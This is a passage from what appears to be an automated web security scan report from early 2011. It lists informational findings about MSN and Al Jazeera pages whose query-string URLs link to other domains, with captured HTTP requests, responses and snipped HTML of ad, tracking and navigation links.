<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XAOGnzxr5PxuVa8kggGJBInauOzJMDUUg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X391Bn0BHZY_-wopsWAO-dk8XKY4wrjwM?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XcdDNRXWFQsUczA6RfKwNPNLNf7lMyoD8?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xrx5RHb8jEF9RC6BEHp4hC_RTC2eAWJfg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XUMaGfQinvYL_rkKruQ9NhYT6Cn6CVbzD?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XmuwNUslX0aJ6_2eqL8Bmq-MyAkfuL9kg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xuo2PiOvdO1KWWELNX2bjqCDPhTQFttLg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XwKJJgcnOzooBeiHlda2GVW4uprKR5o1M?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XXVkc4CMEweMYJswTzdbHi7fZPcM_FZVA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XCxJJ9-mWAInyzGx8O8xUausF8ubdPTmG?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>With so many new vehicles on the market, picking just one is a challenge, especially if you're looking for a new <a href="http://www.bing.com/search?q=pickup+truck&src=IE-SearchBox&FORM=A0" onclick="window.open(this.href);return false;">pickup truck</a>. Not only are there multiple manufacturers, each with more than one model to choose from, but each pickup comes in a bewildering variety of <a href="http://www.bing.com/search?q=cab+styles&src=IE-SearchBox&FORM=A0" onclick="window.open(this.href);return false;">cab styles</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Ford+Ranger&src=IE-SearchBox&FORM=A0" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/images/search?q=Nissan+Frontier&FORM=A0#" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Dodge+Dakota+Accessories&src=IE-SearchBox&FORM=A0" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Ford+F-350+Super+Duty&src=IE-SearchBox&FORM=A0" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<li>Become a fan of <a href="http://www.facebook.com/MSNAutos" onclick="window.open(this.href);return false;">MSN Autos on Facebook</a>
...[SNIP]...
</em> <a href="https://canvas.dealix.com/newcars/default.aspx?refid=58940&detid=88000&lnx=msndlx" onclick="window.open(this.href);return false;">get a free price quote</a>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://autos.msn.us.intellitxt.com/ast/js/msn/autos.msn_cs.js"></script>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalauto.112.2O7.net/b/ss/msnportalauto/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.76. http://english.aljazeera.net/_inc/adsrc.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://english.aljazeera.net
Path:	/_inc/adsrc.html

Issue detail

The page was loaded from a URL containing a query string:

http://english.aljazeera.net/_inc/adsrc.html?'+ord+'

The response contains the following links to other domains:

http://ad.ae.doubleclick.net/ad/aljazeera_EN/;ord=123456789?
http://ad.ae.doubleclick.net/jump/aljazeera_EN/;ord=123456789?

Request

GET /_inc/adsrc.html?'+ord+' HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Referer: http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:45:25 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
Content-Length: 2046
ETag: "bf291890be4dcb1:cfb"
Last-Modified: Mon, 06 Sep 2010 12:25:16 GMT
Content-Type: text/html
Age: 135
X-Cache: HIT from 12.120.11.63
Via: 1.1 12.120.11.63:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

<html>
<body marginheight=0 marginwidth=0 topmargin=0 leftmargin=0>

<script language="JavaScript" type="text/javascript">

var str = window.p
...[SNIP]...
<noscript>
<a href="http://ad.ae.doubleclick.net/jump/aljazeera_EN/;ord=123456789?" target="_blank"><img src="http://ad.ae.doubleclick.net/ad/aljazeera_EN/;ord=123456789?" width="" height="" border="0" alt=""></a>
...[SNIP]...

22.77. http://entertainment.redacted/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/news/

Issue detail

The page was loaded from a URL containing a query string:

http://entertainment.msn.com/news/?ipp=15

The response contains the following links to other domains:

http://download.live.com/?sku=messenger
http://entcss.s-redacted/App_Themes/IE7/IE79613.css
http://entcss.s-redacted/styles/e9613.css
http://entcss.s-redacted/styles/entertainment9613.css
http://entcss.s-redacted/styles/gtl_sitegeneric9613.css
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://entimg.s-redacted/i/grandprix/Digg.gif
http://entimg.s-redacted/i/grandprix/discuss.gif
http://entimg.s-redacted/i/grandprix/mail.gif
http://entimg.s-redacted/i/grandprix/msft.png
http://entimg.s-redacted/i/grandprix/nav_pipe.gif
http://entimg.s-redacted/i/grandprix/spacesBlog.gif
http://entimg.s-redacted/i/ms/ms_logo.gif
http://entimg.s-redacted/i/sp.gif
http://feeds.wonderwall.com/rss/wall.xml
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/resources/neutral/launchhelp.js
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://stc.alphablu.msn-int.com/br/chan/css/1/cntwmodule.css
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?Form=a25
http://www.bing.com/search?q=cheryl+burke&form=msnena
http://www.bing.com/search?q=jimmy+buffett&form=msnena
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse/Sundance
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/share.php?u=http%3a%2f%2fentertainment.redacted%2fnews%2f%3fipp%3d15%26affid%3dfb
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406113&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.redacted%2Fnews%2F%3Fipp%3D15&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.redacted%2fnews%2f%3fipp%3d15%26ppcb%3d
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /news/?ipp=15 HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 62332
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=8a5a59dee68945d08f92f03252676946; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:48:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Just In Ne
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><script type="text/javascript">
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" href="http://stc.alphablu.msn-int.com/br/chan/css/1/cntwmodule.css" />

<STYLE>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" rel="">Careers & Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps & Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections & Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=a25">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406113&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.redacted%2Fnews%2F%3Fipp%3D15&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.redacted%2fnews%2f%3fipp%3d15%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<DIV class=titleBar3>Celebrity News, Photos..& Gossip..<a href=http://feeds.wonderwall.com/rss/wall.xml class="altlink"><IMG border=0 src="http://entimg.msn.com/i/ms/rssicon.gif">
...[SNIP]...
<div class="newsToolBarCommentsIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/discuss.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarMailIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/mail.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarDiggIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/Digg.gif" style="border-width:0px;" /></div>
...[SNIP]...
</style><a href='http://www.facebook.com/share.php?u=http%3a%2f%2fentertainment.msn.com%2fnews%2f%3fipp%3d15%26affid%3dfb' onclick='return fbs_click()' target='_blank' class='fb_share_link'>Facebook</a>
...[SNIP]...
<div class="newsToolBarSpacesIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/spacesBlog.gif" style="border-width:0px;" /></div>
...[SNIP]...
<P><a href=http://www.bing.com/search?q=cheryl+burke&form=msnena class="altlink" target="new">Cheryl Burke</a>
...[SNIP]...
</P><a href=http://www.bing.com/search?q=jimmy+buffett&form=msnena class="altlink" target="new">Jimmy Buffett</a>
...[SNIP]...
<DIV class=GossipSummaryContentDiv><a href=http://www.bing.com/videos/browse/Sundance class="altlink"><STRONG>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

22.78. http://entertainment.redacted/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/news/

Issue detail

The page was loaded from a URL containing a query string:

http://entertainment.msn.com/news/?ipp=15

The response contains the following links to other domains:

http://download.live.com/?sku=messenger
http://entcss.s-redacted/App_Themes/IE7/IE79613.css
http://entcss.s-redacted/styles/e9613.css
http://entcss.s-redacted/styles/entertainment9613.css
http://entcss.s-redacted/styles/gtl_sitegeneric9613.css
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://entimg.s-redacted/i/grandprix/Digg.gif
http://entimg.s-redacted/i/grandprix/discuss.gif
http://entimg.s-redacted/i/grandprix/mail.gif
http://entimg.s-redacted/i/grandprix/msft.png
http://entimg.s-redacted/i/grandprix/nav_pipe.gif
http://entimg.s-redacted/i/grandprix/spacesBlog.gif
http://entimg.s-redacted/i/ms/ms_logo.gif
http://entimg.s-redacted/i/sp.gif
http://feeds.wonderwall.com/rss/wall.xml
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/resources/neutral/launchhelp.js
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://stc.alphablu.msn-int.com/br/chan/css/1/cntwmodule.css
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?Form=a25
http://www.bing.com/search?q=cheryl+burke&form=msnena
http://www.bing.com/search?q=jimmy+buffett&form=msnena
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse/Sundance?ocid=sdnews
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/share.php?u=http%3a%2f%2fentertainment.redacted%2fnews%2f%3fipp%3d15%26affid%3dfb
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344775&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.redacted%2Fnews%2F%3Fipp%3D15&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.redacted%2fnews%2f%3fipp%3d15%26ppcb%3d
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /news/?ipp=15 HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 62440
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=1c50334278564aa1b74292ad53e492f6; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Just In Ne
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><script type="text/javascript">
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" href="http://stc.alphablu.msn-int.com/br/chan/css/1/cntwmodule.css" />

<STYLE>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" rel="">Careers & Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps & Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections & Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=a25">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344775&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.redacted%2Fnews%2F%3Fipp%3D15&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.redacted%2fnews%2f%3fipp%3d15%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<DIV class=titleBar3>Celebrity News, Photos..& Gossip..<a href=http://feeds.wonderwall.com/rss/wall.xml class="altlink"><IMG border=0 src="http://entimg.msn.com/i/ms/rssicon.gif">
...[SNIP]...
<div class="newsToolBarCommentsIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/discuss.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarMailIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/mail.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarDiggIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/Digg.gif" style="border-width:0px;" /></div>
...[SNIP]...
</style><a href='http://www.facebook.com/share.php?u=http%3a%2f%2fentertainment.msn.com%2fnews%2f%3fipp%3d15%26affid%3dfb' onclick='return fbs_click()' target='_blank' class='fb_share_link'>Facebook</a>
...[SNIP]...
<div class="newsToolBarSpacesIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/spacesBlog.gif" style="border-width:0px;" /></div>
...[SNIP]...
<P><a href=http://www.bing.com/search?q=cheryl+burke&form=msnena class="altlink" target="new">Cheryl Burke</a>
...[SNIP]...
</P><a href=http://www.bing.com/search?q=jimmy+buffett&form=msnena class="altlink" target="new">Jimmy Buffett</a>
...[SNIP]...
<TD class=rp5 width=75 align=left><a href="http://www.bing.com/videos/browse/Sundance?ocid=sdnews " class="altlink"><IMG border=0 alt=Bing src="http://entimg.msn.com/i/140/ent/bingbar_140.jpg" width=140 height=101>
...[SNIP]...
<STRONG><a href="http://www.bing.com/videos/browse/Sundance?ocid=sdnews " class="altlink">Sundance 2011</a>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

22.79. http://entertainment.redacted/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/video/

Issue detail

The page was loaded from a URL containing a query string:

http://entertainment.msn.com/video/?from=en-us_msnhp

The response contains the following links to other domains:

http://download.live.com/?sku=messenger
http://entcss.s-redacted/App_Themes/IE7/IE79613.css
http://entcss.s-redacted/i/video/ent/v5/css/custom_0047.css
